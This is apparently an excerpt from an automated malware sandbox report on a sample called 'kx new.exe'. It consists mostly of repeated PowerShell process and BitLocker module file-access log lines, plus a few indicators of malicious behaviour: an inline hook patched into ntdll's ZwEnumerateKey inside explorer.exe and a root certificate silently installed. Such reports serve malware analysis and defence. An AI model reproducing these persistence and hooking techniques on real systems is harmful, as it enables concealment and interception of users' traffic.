Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\kx new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\kx new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
